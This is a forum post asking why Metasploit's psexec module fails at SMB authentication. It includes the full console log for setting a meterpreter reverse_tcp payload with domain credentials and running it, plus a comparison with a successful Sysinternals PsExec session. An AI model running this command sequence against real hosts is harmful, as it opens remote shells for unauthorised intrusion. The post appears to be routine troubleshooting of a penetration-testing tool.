psexec exploit in metasploit

Hi All,

Please see the error message when running the exploit. It does not seem to get past authentication.

    msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
    msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    msf exploit(windows/smb/psexec) > set RHOST
    RHOST =>
    msf exploit(windows/smb/psexec) > set LHOST
    LHOST =>
    msf exploit(windows/smb/psexec) > set SMBDomain CORP
    SMBDomain => CORP
    msf exploit(windows/smb/psexec) > set SMBUser "localadmin"
    SMBUser => localadmin
    msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd"
    SMBPass => MrPassw0rd
    msf exploit(windows/smb/psexec) > set LPORT 4444
    LPORT => 443
    msf exploit(windows/smb/psexec) > exploit
    [*] Started reverse TCP handler on
    [*] - Connecting to the server...
    [*] - Authenticating to| as user 'CORP\localadmin'...
    [-] - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host.
    [*] Exploit completed, but no session was created.
    msf exploit(windows/smb/psexec) > version
    Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b
    Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b

I tested authentication by running the Sysinternals PsExec outside of Metasploit. PsExec was successful.

    C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\ -u CORP\localadmin cmd
    PsExec v2.2 - Execute processes remotely
    Copyright (C) 2001-2016 Mark Russinovich
    Sysinternals -
    Password:
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.
    C:\Windows\system32>whoami
    CORP\localadmin

Same result by using the exploit psexec_psh. Please give advice. Thanks.

Regards,
AA

Posted by aa about a year ago